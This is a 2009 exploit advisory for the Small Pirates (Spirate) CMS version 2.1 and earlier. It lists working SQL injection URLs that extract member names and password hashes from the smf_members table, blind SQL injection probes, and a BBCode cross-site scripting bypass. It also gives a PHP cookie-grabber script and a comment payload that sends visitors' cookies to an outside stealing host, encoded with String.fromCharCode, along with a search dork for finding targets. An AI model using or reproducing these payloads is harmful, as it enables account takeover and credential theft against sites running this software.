Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21900
HistoryMay 29, 2009 - 12:00 a.m.

MULTIPLE REMOTE VULNERABILITIES --Small Pirates v-2.1-->

2009-05-2900:00:00
vulners.com
104

MULTIPLE REMOTE VULNERABILITIES --Small Pirates v-2.1–>

CMS INFORMATION:

–>WEB: http://spirate.net/foro/
–>DOWNLOAD: http://spirate.net/foro/
–>DEMO: http://www.santiagoescraches.com.ar/index.php
–>CATEGORY: CMS / Board

CMS VULNERABILITY:

–>TESTED ON: firefox 3
–>DORK: "Basado en Spirate"
–>CATEGORY: SQL INJECTION VULNERABILITIES / COOKIE STEALING / BLIND SQL INJECTION
–>AFFECT VERSION: <= 2.1
–>Discovered Bug date: 2009-05-10
–>Reported Bug date: 2009-05-10
–>Fixed bug date: N/A
–>Info patch: Not fixed
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: A mi novia Marijose…hermano,cunyada, padres (y amigos xD) por su apoyo.
–>EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################

<<<<---------++++++++++++++ Condition: Nothing ++++++++++++++++±-------->>>>


INTRO:

This system is a mixed combinations.

Info by admin (quote):

"cw*= SMF+Paquetes"
"Spirate=cw+aсadidos+reparaciones+correcciones"

"*cw = casitaweb."


PROOFS OF CONCEPT:

[++] GET var –> 'id'

[++] File vuln –> 'pag1.php'



[++] GET var --&gt; &#39;id&#39;

[++] File vuln --&gt; &#39;pag1-guest.php&#39;


~~~~~&gt;
http://[HOST]/pag1-guest.php?id=-1+UNION+ALL+SELECT+1,2,3,concat&#40;user&#40;&#41;,0x3A3A3A,database&#40;&#41;&#41;,5,6/*


[++] GET var --&gt; &#39;id&#39;

[++] File vuln --&gt; &#39;rss-coment_post.php&#39;

[++] Note --&gt; More info in source code


~~~~~&gt;
http://[HOST]/web/rss/rss-coment_post.php?id=-1+UNION+ALL+SELECT+1,2,concat&#40;user&#40;&#41;,0x3A3A,database&#40;&#41;&#41;,4,5,6,version&#40;&#41;,8/*



[++] GET var --&gt; &#39;id&#39;

[++] File vuln --&gt; &#39;rss-pic-comment.php&#39;

[++] Note --&gt; More info in source code


~~~~~&gt;
http://[HOST]/web/rss/rss-pic-comment.php?id=-1+UNION+ALL+SELECT+1,2,3,4,current_user&#40;&#41;,6,user&#40;&#41;,8,9,user&#40;&#41;,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version&#40;&#41;,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81/*


[++[Return]++] ~~~~~&gt; user, version and database.


----------
EXPLOITS:
----------


~~~~~&gt;
http://[HOST]/pag1.php?id=-1+UNION+ALL+SELECT+1,2,3,concat&#40;memberName,0x3A3A3A,passwd&#41;,5,6+FROM+smf_members+WHERE+ID_MEMBER=1/*

~~~~~&gt;
http://[HOST]/pag1-guest.php?id=-1+UNION+ALL+SELECT+1,2,3,concat&#40;memberName,0x3A3A3A,passwd&#41;,5,6+FROM+smf_members+WHERE+ID_MEMBER=1/*

~~~~~&gt;
http://[HOST]/web/rss/rss-coment_post.php?id=-1+UNION+ALL+SELECT+1,2,concat&#40;memberName,0x3A3A3A,passwd&#41;,4,5,6,concat&#40;memberName,0x3A3A3A,passwd&#41;,8+FROM+smf_members+WHERE+ID_MEMBER=1/*

~~~~~&gt;
http://[HOST]/web/rss/rss-pic-comment.php?id=-1+UNION+ALL+SELECT+1,2,3,4,concat&#40;memberName,0x3A3A3A,passwd&#41;,6,concat&#40;memberName,0x3A3A3A,passwd&#41;,8,9,concat&#40;memberName,0x3A3A3A,passwd&#41;,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat&#40;memberName,0x3A3A3A,passwd&#41;,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81+FROM+smf_members+WHERE+ID_MEMBER=1/*


[++[Return]++] ~~~~~&gt; memberName:::passwd in &#39;members&#39; table



######################################
//////////////////////////////////////

COOKIE STEALING VULN &#40;BYPASS BBCODE&#41;:

//////////////////////////////////////
######################################


&lt;&lt;&lt;&lt;---------++++++++++++++ Condition: Post a comment +++++++++++++++++---------&gt;&gt;&gt;&gt;


-------
INTRO:
-------


This system is a mixed combinations.

Info by admin &#40;quote&#41;:

&quot;cw*= SMF+Paquetes&quot;
&quot;Spirate=cw+aсadidos+reparaciones+correcciones&quot;

&quot;*cw = casitaweb.&quot;


-------------------
PROOF OF CONCEPT:
-------------------


[url][img]http://www.google.es onmouseover=while&#40;true&#41;{alert&#40;1&#41;;} [/img][/url]


[++[Return]++] ~~~~~&gt; recursive alert message saying &quot;1&quot;


----------
EXPLOIT:
----------


Cookie Grabber Script --&gt; capturethecookies.php

Example Script &#40;Before Creat exploited.txt&#41;:

&lt;?php
$ck=$_GET[&quot;ck&quot;]; //Capture the cookies   
$manejador=fopen&#40;&quot;exploited.txt&quot;,&#39;a&#39;&#41;;
fwrite&#40;$manejador, &quot;Cookie:&#92;r&#92;n&quot;.htmlentities&#40;$ck&#41;.&quot;&#92;r&#92;n--EOF--&#92;r&#92;n&quot;&#41;; //Save the values
fclose&#40;$manejador&#41;;
echo &quot;&lt;script&gt;location.href=&#39;http://[HOST]/index.php&#39;;&lt;/script&gt;&quot;; //Redirect...
?&gt;

Example Hosting --&gt; http://www.myphpcookiestealing.es/capturethecookies.php?ck=

Poisoning&#39;s comment:

[url][img]http://www.owned.owned
onmouseover=document.location=String.fromCharCode&#40;104,116,116,112,58,47,47,119,119,119,46,109,121,112,104,112,99,111,111,107,105,101,115,116,101,97,108,105,110,103,46,101,115,47,99,97,112,116,117,114,101,116,104,101,99,111,111,107,105,101,115,46,112,104,112,63,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61&#41;+document.cookie
[/img][/url]


[++[Return]++] ~~~~~&gt; Cookie and PHPSESSID in exploited.txt


###########################
///////////////////////////

BLIND SQL INJECTION &#40;SQLi&#41;:

///////////////////////////
###########################


&lt;&lt;&lt;&lt;---------++++++++++++++ Condition: Nothing +++++++++++++++++---------&gt;&gt;&gt;&gt;


-------
INTRO:
-------


This system is a mixed combinations.

Info by admin &#40;quote&#41;:

&quot;cw*= SMF+Paquetes&quot;
&quot;Spirate=cw+aсadidos+reparaciones+correcciones&quot;

&quot;*cw = casitaweb.&quot;


-------------------
PROOFS OF CONCEPT:
-------------------


[++] GET var --&gt; &#39;id&#39;

[++] File vuln --&gt; &#39;index.php&#39;


~~~~~&gt; http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+1=1 --&gt; TRUE

~~~~~&gt; http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+1=0 --&gt; FALSE


----------
EXPLOITS:
----------


~~~~~&gt; http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+substring&#40;@@version,1,1&#41;=5
--&gt; TRUE

~~~~~&gt; http://[HOST]/?type=rss;action=.xml;sa=comentarios;id=7+and+substring&#40;@@version,1,1&#41;=4
--&gt; FALSE



#######################################################################
#######################################################################
##*******************************************************************##
##      SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ...     ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################